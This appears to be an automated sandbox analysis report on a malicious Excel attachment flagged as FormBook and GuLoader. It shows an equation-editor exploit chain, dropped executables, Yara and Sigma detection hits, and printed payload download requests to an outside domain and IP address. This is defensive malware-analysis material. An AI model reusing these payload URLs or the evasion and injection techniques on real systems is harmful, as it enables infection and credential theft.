Analysis Report Unique food order.xlsx

Overview

General Information

Sample Name: Unique food order.xlsx
Analysis ID: 320235
MD5: f2cd263042fce1a4c2cbeed5f1676429
SHA1: 608334d6c55e50f3447f865bca59e05b7b60e0cb
SHA256: f2f88e0287d17638c5d902a49d19b2c4e989dc2a511411ce959c91b642fb9359
Tags: VelvetSweatshop xlsx

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1552 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2408 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2692 cmdline: 'C:\Users\Public\vbc.exe' MD5: C05EEE88F0B57E853996957D6523397B)
      • vbc.exe (PID: 2868 cmdline: 'C:\Users\Public\vbc.exe' MD5: C05EEE88F0B57E853996957D6523397B)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • autoconv.exe (PID: 1664 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 09D786401F6CA6AEB16B2811B169F944)
          • NAPSTAT.EXE (PID: 1840 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
            • cmd.exe (PID: 2168 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Sigma Overview

      System Summary:

      Sigma detected: Droppers Exploiting CVE-2017-11882
      Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2408, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2692
      Sigma detected: EQNEDT32.EXE connecting to internet
      Source: Network Connection | Author: Joe Security | Data: DestinationIp: 103.125.191.5, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2408, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
      Sigma detected: File Dropped By EQNEDT32EXE
      Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2408, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
      Sigma detected: Executables Started in Suspicious Folder
      Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2408, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2692
      Sigma detected: Execution in Non-Executable Folder
      Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2408, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2692
      Sigma detected: Suspicious Program Location Process Starts
      Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2408, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2692

      Signature Overview

      AV Detection:

      Antivirus detection for URL or domain
      Source: http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exe | Avira URL Cloud: Label: malware
      Multi AV Scanner detection for submitted file
      Source: Unique food order.xlsx | Virustotal: Detection: 24%
      Source: Unique food order.xlsx | ReversingLabs: Detection: 22%
      Yara detected FormBook
      Source: Yara match | File source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY

      Exploits:

      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
      Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 4x nop then pop esi, 9_2_00097295
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 4x nop then pop esi, 9_2_000972A5
      Source: global traffic | DNS query: name: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
      Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80

      Networking:

      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
      Source: Traffic | Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 103.125.191.5:80
      Source: Traffic | Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.22:49166 -> 103.125.191.5:80
      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Thu, 19 Nov 2020 06:43:17 GMT | Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38 | Last-Modified: Wed, 18 Nov 2020 21:48:32 GMT | ETag: "f000-5b4689298b6b3" | Accept-Ranges: bytes | Content-Length: 61440 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
      Source: Joe Sandbox View | ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
      Source: global traffic | HTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /bin_xMjelaYnr43.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: 103.125.191.5 | Cache-Control: no-cache
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_001B5F9F InternetReadFile, 5_2_001B5F9F
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
      Source: vbc.exe, 00000005.00000002.2360648319.000000000080B000.00000004.00000020.sdmp | String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com86f equals www.linkedin.com (Linkedin)
      Source: vbc.exe, 00000005.00000002.2360648319.000000000080B000.00000004.00000020.sdmp | String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
      Source: unknown | DNS traffic detected: queries for: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
      Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp | String found in binary or memory: http://%s.com
      Source: vbc.exe | String found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.bin
      Source: vbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmp | String found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.binY~f
      Source: vbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmp | String found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.binq~f
      Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp | String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp | String found in binary or memory: http://treyresearch.net
      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp | String found in binary or memory: http://www.%s.com
      Source: vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
      Source: explorer.exe, 00000007.00000000.2337234886.00000000039F4000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
      Source: explorer.exe, 00000007.00000000.2332531261.0000000000260000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv

      E-Banking Fraud:

      Yara detected FormBook
      Source: Yara match | File source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      Malicious sample detected (through community Yara rule)
      Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000002.2382070172.0000000000553000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
      Office equation editor drops PE file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
      Source: C:\Users\Public\vbc.exe, Process Stats: CPU usage > 98%
      Source: C:\Users\Public\vbc.exe, Memory allocated: 76E20000 page execute and read and write
      Source: C:\Users\Public\vbc.exe, Memory allocated: 76D20000 page execute and read and write
      Source: C:\Users\Public\vbc.exe, Memory allocated: 76E20000 page execute and read and write
      Source: C:\Users\Public\vbc.exe, Memory allocated: 76D20000 page execute and read and write
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Memory allocated: 76E20000 page execute and read and write
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Memory allocated: 76D20000 page execute and read and write
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031044B EnumWindows,NtSetInformationThread,4_2_0031044B
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003154F4 NtSetInformationThread,NtWriteVirtualMemory,LoadLibraryA,4_2_003154F4
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315A6C NtProtectVirtualMemory,4_2_00315A6C
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003106B1 NtSetInformationThread,CloseServiceHandle,TerminateProcess,CreateFileA,4_2_003106B1
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315336 NtSetInformationThread,LoadLibraryA,4_2_00315336
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031232A NtWriteVirtualMemory,4_2_0031232A
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315F9F NtResumeThread,4_2_00315F9F
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031078C CloseServiceHandle,NtWriteVirtualMemory,TerminateProcess,4_2_0031078C
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315435 NtWriteVirtualMemory,4_2_00315435
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316039 NtResumeThread,4_2_00316039
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316015 NtResumeThread,4_2_00316015
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00312455 NtWriteVirtualMemory,4_2_00312455
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003104B2 NtSetInformationThread,4_2_003104B2
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003124BD NtWriteVirtualMemory,4_2_003124BD
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316089 NtResumeThread,4_2_00316089
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003160D1 NtResumeThread,4_2_003160D1
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003104CD NtSetInformationThread,4_2_003104CD
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00312531 NtWriteVirtualMemory,4_2_00312531
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00310537 NtSetInformationThread,4_2_00310537
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00310516 NtSetInformationThread,4_2_00310516
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316106 NtResumeThread,4_2_00316106
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031059D NtSetInformationThread,4_2_0031059D
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003161ED NtResumeThread,4_2_003161ED
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003105D9 NtSetInformationThread,4_2_003105D9
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316239 NtResumeThread,4_2_00316239
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031260D NtWriteVirtualMemory,4_2_0031260D
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003162C5 NtResumeThread,4_2_003162C5
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316325 NtResumeThread,4_2_00316325
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00312705 NtWriteVirtualMemory,4_2_00312705
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00310F7D NtWriteVirtualMemory,4_2_00310F7D
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031276A NtWriteVirtualMemory,4_2_0031276A
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315FE5 NtResumeThread,4_2_00315FE5
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003147EF NtSetInformationThread,4_2_003147EF
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003123D5 NtWriteVirtualMemory,4_2_003123D5
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315FC1 NtResumeThread,4_2_00315FC1
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_1E98FEA0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_1E98FED0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FFB4 NtCreateSection,LdrInitializeThunk,5_2_1E98FFB4
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_1E98FC90
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FC60 NtMapViewOfSection,LdrInitializeThunk,5_2_1E98FC60
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FD8C NtDelayExecution,LdrInitializeThunk,5_2_1E98FD8C
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_1E98FDC0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_1E98FAD0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_1E98FAE8
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_1E98FBB8
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_1E98FB68
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98F900 NtReadFile,LdrInitializeThunk,5_2_1E98F900
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9900C4 NtCreateFile,LdrInitializeThunk,5_2_1E9900C4
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E990048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_1E990048
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E990078 NtResumeThread,LdrInitializeThunk,5_2_1E990078
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FE24 NtWriteVirtualMemory,5_2_1E98FE24
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FFFC NtCreateProcessEx,5_2_1E98FFFC
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FF34 NtQueueApcThread,5_2_1E98FF34
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FC30 NtOpenProcess,5_2_1E98FC30
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FC48 NtSetInformationFile,5_2_1E98FC48
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E990C40 NtGetContextThread,5_2_1E990C40
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E991D80 NtSuspendThread,5_2_1E991D80
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FD5C NtEnumerateKey,5_2_1E98FD5C
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FAB8 NtQueryValueKey,5_2_1E98FAB8
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FA20 NtQueryInformationFile,5_2_1E98FA20
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FA50 NtEnumerateValueKey,5_2_1E98FA50
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FBE8 NtQueryVirtualMemory,5_2_1E98FBE8
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FB50 NtCreateKey,5_2_1E98FB50
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98F8CC NtWaitForSingleObject,5_2_1E98F8CC
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98F9F0 NtClose,5_2_1E98F9F0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98F938 NtWriteFile,5_2_1E98F938
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E991930 NtSetContextThread,5_2_1E991930
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9907AC NtCreateMutant,5_2_1E9907AC
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9910D0 NtOpenProcessToken,5_2_1E9910D0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E990060 NtQuerySection,5_2_1E990060
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9901D4 NtSetValueKey,5_2_1E9901D4
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E99010C NtOpenDirectoryObject,5_2_1E99010C
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E991148 NtOpenThread,5_2_1E991148
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B5A6C NtProtectVirtualMemory,5_2_001B5A6C
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B00C4 NtCreateFile,LdrInitializeThunk,9_2_020B00C4
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B07AC NtCreateMutant,LdrInitializeThunk,9_2_020B07AC
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_020AFAD0
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFAE8 NtQueryInformationProcess,LdrInitializeThunk,9_2_020AFAE8
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFB68 NtFreeVirtualMemory,LdrInitializeThunk,9_2_020AFB68
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AF900 NtReadFile,LdrInitializeThunk,9_2_020AF900
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AF9F0 NtClose,LdrInitializeThunk,9_2_020AF9F0
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_020AFED0
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFDC0 NtQuerySystemInformation,LdrInitializeThunk,9_2_020AFDC0
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B0048 NtProtectVirtualMemory,9_2_020B0048
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B0060 NtQuerySection,9_2_020B0060
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B0078 NtResumeThread,9_2_020B0078
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B10D0 NtOpenProcessToken,9_2_020B10D0
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B010C NtOpenDirectoryObject,9_2_020B010C
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B1148 NtOpenThread,9_2_020B1148
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B01D4 NtSetValueKey,9_2_020B01D4
